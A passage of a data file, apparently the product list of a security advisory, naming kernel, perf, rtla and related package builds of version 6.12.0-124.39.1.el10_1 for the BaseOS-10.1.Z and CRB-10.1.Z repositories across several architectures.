"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
